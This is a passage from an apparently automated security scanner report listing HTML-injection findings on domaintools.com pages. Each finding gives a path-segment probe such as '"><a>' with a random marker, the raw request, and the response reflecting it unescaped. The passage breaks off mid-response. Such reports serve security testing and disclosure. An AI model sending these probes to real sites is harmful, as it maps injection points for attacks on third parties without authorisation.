
3.112. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/privacy-policy/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f78d9<a>252e4aac4cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/f78d9<a>252e4aac4cc/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:19 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>252e4aac4cc">Whois record for "f78d9<a>252e4aac4cc"</a>
...[SNIP]...

3.113. http://www.domaintools.com/about/privacy-policy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/privacy-policy/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef226"><a>8646b24e80f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/privacy-policyef226"><a>8646b24e80f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:10 GMT
Content-Length: 12149
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=privacy-policyef226"><a>8646b24e80f">
...[SNIP]...

3.114. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/terms-of-service/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4917d"><a>f4a878ff38e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/terms-of-service4917d"><a>f4a878ff38e/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:12 GMT
Content-Length: 12159
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=terms-of-service4917d"><a>f4a878ff38e">
...[SNIP]...

3.115. http://www.domaintools.com/about/terms-of-service/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/terms-of-service/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e51af<a>92fcda998db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/e51af<a>92fcda998db/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:21 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>92fcda998db">Whois record for "e51af<a>92fcda998db"</a>
...[SNIP]...

3.116. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/why-domain-tools/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 64ffe<a>500c07d19dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/64ffe<a>500c07d19dd/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:45 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>500c07d19dd">Whois record for "64ffe<a>500c07d19dd"</a>
...[SNIP]...

3.117. http://www.domaintools.com/about/why-domain-tools/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /about/why-domain-tools/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 886bd"><a>dc914d52238 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about/why-domain-tools886bd"><a>dc914d52238/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:30 GMT
Content-Length: 12159
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=why-domain-tools886bd"><a>dc914d52238">
...[SNIP]...

3.118. http://www.domaintools.com/api/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /api/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df9f5"><a>c319af131c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /apidf9f5"><a>c319af131c2/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:19 GMT
Content-Length: 12053
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=apidf9f5"><a>c319af131c2">
...[SNIP]...

3.119. http://www.domaintools.com/api/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /api/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32e88<a>4962493fd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /api32e88<a>4962493fd8/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:29 GMT
Content-Length: 12024
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>4962493fd8">Whois record for "api32e88<a>4962493fd8"</a>
...[SNIP]...

3.120. http://www.domaintools.com/buy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45edb"><a>a99fc5a8f9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy45edb"><a>a99fc5a8f9f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:33 GMT
Content-Length: 12053
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=buy45edb"><a>a99fc5a8f9f">
...[SNIP]...

3.121. http://www.domaintools.com/buy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c65df<a>b9b33efc701 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buyc65df<a>b9b33efc701/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:45 GMT
Content-Length: 12032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>b9b33efc701">Whois record for "buyc65df<a>b9b33efc701"</a>
...[SNIP]...

3.122. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/availability-check/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e7e5<a>796330dd95f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/9e7e5<a>796330dd95f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:09 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>796330dd95f">Whois record for "9e7e5<a>796330dd95f"</a>
...[SNIP]...

3.123. http://www.domaintools.com/buy/availability-check/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/availability-check/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a666"><a>fc8a8f6f00b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/availability-check9a666"><a>fc8a8f6f00b/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:57 GMT
Content-Length: 12165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=availability-check9a666"><a>fc8a8f6f00b">
...[SNIP]...

3.124. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-search/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b9b"><a>ea270165358 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/domain-search70b9b"><a>ea270165358/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:57 GMT
Content-Length: 12137
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-search70b9b"><a>ea270165358">
...[SNIP]...

3.125. http://www.domaintools.com/buy/domain-search/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-search/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a42b9<a>23d7ad8b4b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/a42b9<a>23d7ad8b4b4/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:08 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>23d7ad8b4b4">Whois record for "a42b9<a>23d7ad8b4b4"</a>
...[SNIP]...

3.126. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-suggestions/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cb5a<a>f19f1c6f98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/2cb5a<a>f19f1c6f98/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:09 GMT
Content-Length: 12004
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>f19f1c6f98">Whois record for "2cb5a<a>f19f1c6f98"</a>
...[SNIP]...

3.127. http://www.domaintools.com/buy/domain-suggestions/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-suggestions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3adc7"><a>2f6ae51c614 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/domain-suggestions3adc7"><a>2f6ae51c614/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:58 GMT
Content-Length: 12165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-suggestions3adc7"><a>2f6ae51c614">
...[SNIP]...

3.128. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-typo-finder/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33878"><a>6fc30e9bad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/domain-typo-finder33878"><a>6fc30e9bad5/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:59 GMT
Content-Length: 12165
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-typo-finder33878"><a>6fc30e9bad5">
...[SNIP]...

3.129. http://www.domaintools.com/buy/domain-typo-finder/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/domain-typo-finder/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e785a<a>fa270ecd3a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/e785a<a>fa270ecd3a7/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:10 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>fa270ecd3a7">Whois record for "e785a<a>fa270ecd3a7"</a>
...[SNIP]...

3.130. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/dropping-names/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8887c<a>4f2671d7934 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/8887c<a>4f2671d7934/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:08 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>4f2671d7934">Whois record for "8887c<a>4f2671d7934"</a>
...[SNIP]...

3.131. http://www.domaintools.com/buy/dropping-names/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/dropping-names/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65742"><a>0f8e51c0745 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/dropping-names65742"><a>0f8e51c0745/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
